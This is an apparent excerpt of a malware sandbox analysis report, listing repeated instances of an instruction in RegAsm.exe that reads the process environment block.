Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]	2_2_030403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]	2_2_030403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]	2_2_030403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303DBE9 mov eax, dword ptr fs:[00000030h]	2_2_0303DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03028A0A mov eax, dword ptr fs:[00000030h]	2_2_03028A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]	2_2_03015210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03015210 mov ecx, dword ptr fs:[00000030h]	2_2_03015210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]	2_2_03015210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]	2_2_03015210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301AA16 mov eax, dword ptr fs:[00000030h]	2_2_0301AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301AA16 mov eax, dword ptr fs:[00000030h]	2_2_0301AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DAA16 mov eax, dword ptr fs:[00000030h]	2_2_030DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DAA16 mov eax, dword ptr fs:[00000030h]	2_2_030DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03033A1C mov eax, dword ptr fs:[00000030h]	2_2_03033A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03054A2C mov eax, dword ptr fs:[00000030h]	2_2_03054A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03054A2C mov eax, dword ptr fs:[00000030h]	2_2_03054A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]	2_2_0303A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019240 mov eax, dword ptr fs:[00000030h]	2_2_03019240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019240 mov eax, dword ptr fs:[00000030h]	2_2_03019240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019240 mov eax, dword ptr fs:[00000030h]	2_2_03019240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019240 mov eax, dword ptr fs:[00000030h]	2_2_03019240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DEA55 mov eax, dword ptr fs:[00000030h]	2_2_030DEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030A4257 mov eax, dword ptr fs:[00000030h]	2_2_030A4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030CB260 mov eax, dword ptr fs:[00000030h]	2_2_030CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030CB260 mov eax, dword ptr fs:[00000030h]	2_2_030CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E8A62 mov eax, dword ptr fs:[00000030h]	2_2_030E8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0305927A mov eax, dword ptr fs:[00000030h]	2_2_0305927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304D294 mov eax, dword ptr fs:[00000030h]	2_2_0304D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304D294 mov eax, dword ptr fs:[00000030h]	2_2_0304D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030152A5 mov eax, dword ptr fs:[00000030h]	2_2_030152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030152A5 mov eax, dword ptr fs:[00000030h]	2_2_030152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030152A5 mov eax, dword ptr fs:[00000030h]	2_2_030152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030152A5 mov eax, dword ptr fs:[00000030h]	2_2_030152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030152A5 mov eax, dword ptr fs:[00000030h]	2_2_030152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0302AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0302AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0304FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042ACB mov eax, dword ptr fs:[00000030h]	2_2_03042ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042AE4 mov eax, dword ptr fs:[00000030h]	2_2_03042AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019100 mov eax, dword ptr fs:[00000030h]	2_2_03019100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019100 mov eax, dword ptr fs:[00000030h]	2_2_03019100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019100 mov eax, dword ptr fs:[00000030h]	2_2_03019100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03034120 mov eax, dword ptr fs:[00000030h]	2_2_03034120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03034120 mov eax, dword ptr fs:[00000030h]	2_2_03034120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03034120 mov eax, dword ptr fs:[00000030h]	2_2_03034120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03034120 mov eax, dword ptr fs:[00000030h]	2_2_03034120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03034120 mov ecx, dword ptr fs:[00000030h]	2_2_03034120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304513A mov eax, dword ptr fs:[00000030h]	2_2_0304513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304513A mov eax, dword ptr fs:[00000030h]	2_2_0304513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303B944 mov eax, dword ptr fs:[00000030h]	2_2_0303B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303B944 mov eax, dword ptr fs:[00000030h]	2_2_0303B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301C962 mov eax, dword ptr fs:[00000030h]	2_2_0301C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301B171 mov eax, dword ptr fs:[00000030h]	2_2_0301B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301B171 mov eax, dword ptr fs:[00000030h]	2_2_0301B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304A185 mov eax, dword ptr fs:[00000030h]	2_2_0304A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303C182 mov eax, dword ptr fs:[00000030h]	2_2_0303C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03042990 mov eax, dword ptr fs:[00000030h]	2_2_03042990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030461A0 mov eax, dword ptr fs:[00000030h]	2_2_030461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030461A0 mov eax, dword ptr fs:[00000030h]	2_2_030461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D49A4 mov eax, dword ptr fs:[00000030h]	2_2_030D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D49A4 mov eax, dword ptr fs:[00000030h]	2_2_030D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D49A4 mov eax, dword ptr fs:[00000030h]	2_2_030D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D49A4 mov eax, dword ptr fs:[00000030h]	2_2_030D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030969A6 mov eax, dword ptr fs:[00000030h]	2_2_030969A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030951BE mov eax, dword ptr fs:[00000030h]	2_2_030951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030951BE mov eax, dword ptr fs:[00000030h]	2_2_030951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030951BE mov eax, dword ptr fs:[00000030h]	2_2_030951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030951BE mov eax, dword ptr fs:[00000030h]	2_2_030951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0301B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0301B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0301B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030A41E8 mov eax, dword ptr fs:[00000030h]	2_2_030A41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E4015 mov eax, dword ptr fs:[00000030h]	2_2_030E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E4015 mov eax, dword ptr fs:[00000030h]	2_2_030E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03097016 mov eax, dword ptr fs:[00000030h]	2_2_03097016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03097016 mov eax, dword ptr fs:[00000030h]	2_2_03097016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03097016 mov eax, dword ptr fs:[00000030h]	2_2_03097016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302B02A mov eax, dword ptr fs:[00000030h]	2_2_0302B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302B02A mov eax, dword ptr fs:[00000030h]	2_2_0302B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302B02A mov eax, dword ptr fs:[00000030h]	2_2_0302B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302B02A mov eax, dword ptr fs:[00000030h]	2_2_0302B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304002D mov eax, dword ptr fs:[00000030h]	2_2_0304002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304002D mov eax, dword ptr fs:[00000030h]	2_2_0304002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304002D mov eax, dword ptr fs:[00000030h]	2_2_0304002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304002D mov eax, dword ptr fs:[00000030h]	2_2_0304002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304002D mov eax, dword ptr fs:[00000030h]	2_2_0304002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03030050 mov eax, dword ptr fs:[00000030h]	2_2_03030050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03030050 mov eax, dword ptr fs:[00000030h]	2_2_03030050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E1074 mov eax, dword ptr fs:[00000030h]	2_2_030E1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D2073 mov eax, dword ptr fs:[00000030h]	2_2_030D2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03019080 mov eax, dword ptr fs:[00000030h]	2_2_03019080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03093884 mov eax, dword ptr fs:[00000030h]	2_2_03093884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03093884 mov eax, dword ptr fs:[00000030h]	2_2_03093884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]	2_2_030420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030590AF mov eax, dword ptr fs:[00000030h]	2_2_030590AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0304F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304F0BF mov eax, dword ptr fs:[00000030h]	2_2_0304F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304F0BF mov eax, dword ptr fs:[00000030h]	2_2_0304F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AB8D0 mov eax, dword ptr fs:[00000030h]	2_2_030AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AB8D0 mov eax, dword ptr fs:[00000030h]	2_2_030AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AB8D0 mov eax, dword ptr fs:[00000030h]	2_2_030AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AB8D0 mov eax, dword ptr fs:[00000030h]	2_2_030AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AB8D0 mov eax, dword ptr fs:[00000030h]	2_2_030AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030140E1 mov eax, dword ptr fs:[00000030h]	2_2_030140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030140E1 mov eax, dword ptr fs:[00000030h]	2_2_030140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030140E1 mov eax, dword ptr fs:[00000030h]	2_2_030140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030158EC mov eax, dword ptr fs:[00000030h]	2_2_030158EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E070D mov eax, dword ptr fs:[00000030h]	2_2_030E070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E070D mov eax, dword ptr fs:[00000030h]	2_2_030E070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304A70E mov eax, dword ptr fs:[00000030h]	2_2_0304A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304A70E mov eax, dword ptr fs:[00000030h]	2_2_0304A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303F716 mov eax, dword ptr fs:[00000030h]	2_2_0303F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AFF10 mov eax, dword ptr fs:[00000030h]	2_2_030AFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AFF10 mov eax, dword ptr fs:[00000030h]	2_2_030AFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03014F2E mov eax, dword ptr fs:[00000030h]	2_2_03014F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03014F2E mov eax, dword ptr fs:[00000030h]	2_2_03014F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304E730 mov eax, dword ptr fs:[00000030h]	2_2_0304E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302EF40 mov eax, dword ptr fs:[00000030h]	2_2_0302EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302FF60 mov eax, dword ptr fs:[00000030h]	2_2_0302FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E8F6A mov eax, dword ptr fs:[00000030h]	2_2_030E8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03028794 mov eax, dword ptr fs:[00000030h]	2_2_03028794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03097794 mov eax, dword ptr fs:[00000030h]	2_2_03097794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03097794 mov eax, dword ptr fs:[00000030h]	2_2_03097794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03097794 mov eax, dword ptr fs:[00000030h]	2_2_03097794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030537F5 mov eax, dword ptr fs:[00000030h]	2_2_030537F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301C600 mov eax, dword ptr fs:[00000030h]	2_2_0301C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301C600 mov eax, dword ptr fs:[00000030h]	2_2_0301C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301C600 mov eax, dword ptr fs:[00000030h]	2_2_0301C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03048E00 mov eax, dword ptr fs:[00000030h]	2_2_03048E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030D1608 mov eax, dword ptr fs:[00000030h]	2_2_030D1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304A61C mov eax, dword ptr fs:[00000030h]	2_2_0304A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0304A61C mov eax, dword ptr fs:[00000030h]	2_2_0304A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301E620 mov eax, dword ptr fs:[00000030h]	2_2_0301E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030CFE3F mov eax, dword ptr fs:[00000030h]	2_2_030CFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]	2_2_03027E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]	2_2_03027E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]	2_2_03027E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]	2_2_03027E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]	2_2_03027E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]	2_2_03027E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DAE44 mov eax, dword ptr fs:[00000030h]	2_2_030DAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DAE44 mov eax, dword ptr fs:[00000030h]	2_2_030DAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0302766D mov eax, dword ptr fs:[00000030h]	2_2_0302766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]	2_2_0303AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]	2_2_0303AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]	2_2_0303AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]	2_2_0303AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]	2_2_0303AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030AFE87 mov eax, dword ptr fs:[00000030h]	2_2_030AFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E0EA5 mov eax, dword ptr fs:[00000030h]	2_2_030E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E0EA5 mov eax, dword ptr fs:[00000030h]	2_2_030E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E0EA5 mov eax, dword ptr fs:[00000030h]	2_2_030E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030946A7 mov eax, dword ptr fs:[00000030h]	2_2_030946A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03058EC7 mov eax, dword ptr fs:[00000030h]	2_2_03058EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030436CC mov eax, dword ptr fs:[00000030h]	2_2_030436CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030CFEC0 mov eax, dword ptr fs:[00000030h]	2_2_030CFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030E8ED6 mov eax, dword ptr fs:[00000030h]	2_2_030E8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030276E2 mov eax, dword ptr fs:[00000030h]	2_2_030276E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030416E0 mov ecx, dword ptr fs:[00000030h]	2_2_030416E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0301AD30 mov eax, dword ptr fs:[00000030h]	2_2_0301AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_030DE539 mov eax, dword ptr fs:[00000030h]	2_2_030DE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]	2_2_03023D34
